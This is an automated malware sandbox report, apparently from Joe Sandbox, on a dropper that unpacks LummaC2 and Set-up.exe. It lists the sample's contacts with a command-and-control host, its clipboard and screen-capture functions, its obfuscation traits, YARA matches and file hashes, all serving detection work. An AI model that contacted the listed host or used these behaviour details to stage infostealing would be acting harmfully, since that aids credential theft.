Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Fri, 27 Dec 2024 07:57:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.css
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://.jpg
Source: Set-up.exe, Set-up.exe, 00000002.00000003.1968469606.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1968674966.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1970545914.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1968493704.00000000014DB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1968977470.00000000014E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrm
Source: Set-up.exe.0.dr	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13
Source: Set-up.exe, 00000002.00000003.1968710299.00000000014C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
Source: Set-up.exe, Set-up.exe, 00000002.00000003.1949593906.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1930779176.00000000014EF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1930860427.00000000014EF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1968438893.00000000014EC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1949505192.00000000014EF000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1970566623.00000000014EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0
Source: Set-up.exe, 00000002.00000002.1969788086.0000000000BB9000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://html4/loose.dtd
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe.0.dr	String found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/hsts.html
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ip
Source: YrxiR3yCLm.exe, 00000000.00000003.1717826914.00000000073AF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000000.1726548663.0000000000BBB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_002F1B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_002F1B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_002F1B10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_002F1B10

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_002F1D10 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

1_2_002F1D10

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.YrxiR3yCLm.exe.6e0000.0.unpack, type: UNPACKEDPE

Matched rule: Detects downloader / injector Author: ditekSHen

PE file contains section with special chars

Source: YrxiR3yCLm.exe	Static PE information: section name:
Source: YrxiR3yCLm.exe	Static PE information: section name: .idata
Source: YrxiR3yCLm.exe	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F5135	1_2_002F5135
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C8720	1_2_002C8720
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D683F	1_2_002D683F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F483C	1_2_002F483C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DA800	1_2_002DA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FA800	1_2_002FA800
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FB813	1_2_002FB813
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DD840	1_2_002DD840
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F68A0	1_2_002F68A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D8095	1_2_002D8095
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002EC894	1_2_002EC894
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E30E0	1_2_002E30E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E70F9	1_2_002E70F9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F80C5	1_2_002F80C5
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E20C0	1_2_002E20C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FA0D0	1_2_002FA0D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C3960	1_2_002C3960
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002CC97C	1_2_002CC97C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C5970	1_2_002C5970
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002CB14F	1_2_002CB14F
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FD140	1_2_002FD140
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E59B0	1_2_002E59B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002EC984	1_2_002EC984
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002EC9E9	1_2_002EC9E9
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FE1F0	1_2_002FE1F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002EC9DA	1_2_002EC9DA
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C61D0	1_2_002C61D0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C8A20	1_2_002C8A20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DE230	1_2_002DE230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E6230	1_2_002E6230
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D720B	1_2_002D720B
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DC205	1_2_002DC205
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E7A40	1_2_002E7A40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FD240	1_2_002FD240
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D4A50	1_2_002D4A50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002CF2A0	1_2_002CF2A0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002EC289	1_2_002EC289
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D1A94	1_2_002D1A94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C9290	1_2_002C9290
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DAAE0	1_2_002DAAE0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002CAB20	1_2_002CAB20
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FD320	1_2_002FD320
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C4310	1_2_002C4310
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F1B10	1_2_002F1B10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D7B75	1_2_002D7B75
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002CD35C	1_2_002CD35C
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002EA3B0	1_2_002EA3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FD3B0	1_2_002FD3B0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FDBB0	1_2_002FDBB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F6BF0	1_2_002F6BF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002CE465	1_2_002CE465
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E3C60	1_2_002E3C60
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E8C46	1_2_002E8C46
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C7440	1_2_002C7440
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C4C50	1_2_002C4C50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DDC50	1_2_002DDC50
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FD450	1_2_002FD450
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D64E0	1_2_002D64E0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F74F0	1_2_002F74F0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E1D10	1_2_002E1D10
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FA510	1_2_002FA510
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DD560	1_2_002DD560
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FE540	1_2_002FE540
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E1550	1_2_002E1550
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E7D94	1_2_002E7D94
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D9605	1_2_002D9605
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C6660	1_2_002C6660
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D5640	1_2_002D5640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E5640	1_2_002E5640
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F7EA0	1_2_002F7EA0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FDEB0	1_2_002FDEB0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E66C0	1_2_002E66C0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002EFEC0	1_2_002EFEC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002E26D3	1_2_002E26D3
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DF700	1_2_002DF700
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C9710	1_2_002C9710
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002D0F71	1_2_002D0F71
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002EBF45	1_2_002EBF45
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002C2F40	1_2_002C2F40
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F7790	1_2_002F7790
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DA7FD	1_2_002DA7FD
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002F5FF0	1_2_002F5FF0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002DDFC0	1_2_002DDFC0
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002EDFC3	1_2_002EDFC3
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014D8F53	2_3_014D8F53
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014D898E	2_3_014D898E
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014CA383	2_3_014CA383
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014D8F53	2_3_014D8F53
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014D898E	2_3_014D898E
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014CA383	2_3_014CA383
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014D8F53	2_3_014D8F53
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014D898E	2_3_014D898E
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014CA383	2_3_014CA383
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014D8F53	2_3_014D8F53
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014D898E	2_3_014D898E
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014CA383	2_3_014CA383

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\LummaC2.exe C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Set-up.exe 73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 002D4A40 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: String function: 002C7FF0 appears 45 times

Source: YrxiR3yCLm.exe, 00000000.00000002.1754756843.0000000000DB6000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs YrxiR3yCLm.exe
Source: YrxiR3yCLm.exe, 00000000.00000002.1755483966.00000000016EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs YrxiR3yCLm.exe
Source: YrxiR3yCLm.exe, 00000000.00000002.1757236380.0000000005410000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameladddad.exe4 vs YrxiR3yCLm.exe
Source: YrxiR3yCLm.exe	Binary or memory string: OriginalFilenameladddad.exe4 vs YrxiR3yCLm.exe

Source: YrxiR3yCLm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.YrxiR3yCLm.exe.6e0000.0.unpack, type: UNPACKEDPE

Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector

Source: YrxiR3yCLm.exe

Static PE information: Section: tmjadsgk ZLIB complexity 0.9948250485276883

Source: Set-up.exe.0.dr

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal100.troj.evad.winEXE@5/3@8/2

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_002ED110 CoCreateInstance,

1_2_002ED110

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YrxiR3yCLm.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: YrxiR3yCLm.exe	Virustotal: Detection: 33%
Source: YrxiR3yCLm.exe	ReversingLabs: Detection: 57%

Source: YrxiR3yCLm.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: YrxiR3yCLm.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\YrxiR3yCLm.exe "C:\Users\user\Desktop\YrxiR3yCLm.exe"
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\YrxiR3yCLm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: YrxiR3yCLm.exe

Static file information: File size 6213120 > 1048576

Source: YrxiR3yCLm.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x43d600
Source: YrxiR3yCLm.exe	Static PE information: Raw size of tmjadsgk is bigger than: 0x100000 < 0x1aaa00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\YrxiR3yCLm.exe

Unpacked PE file: 0.2.YrxiR3yCLm.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;tmjadsgk:EW;txnjkebe:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: LummaC2.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4fec3
Source: YrxiR3yCLm.exe	Static PE information: real checksum: 0x5fa13c should be: 0x5fa067

Source: YrxiR3yCLm.exe	Static PE information: section name:
Source: YrxiR3yCLm.exe	Static PE information: section name: .idata
Source: YrxiR3yCLm.exe	Static PE information: section name:
Source: YrxiR3yCLm.exe	Static PE information: section name: tmjadsgk
Source: YrxiR3yCLm.exe	Static PE information: section name: txnjkebe
Source: YrxiR3yCLm.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FD0F0 push eax; mov dword ptr [esp], 03020130h	1_2_002FD0F1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_002FA480 push eax; mov dword ptr [esp], C9D6D7D4h	1_2_002FA48E
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014CA0F0 push FFFFFFCFh; iretd	2_3_014CA0F2
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014C810A push ecx; retf	2_3_014C8129
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014CA0F0 push FFFFFFCFh; iretd	2_3_014CA0F2
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_014C810A push ecx; retf	2_3_014C8129
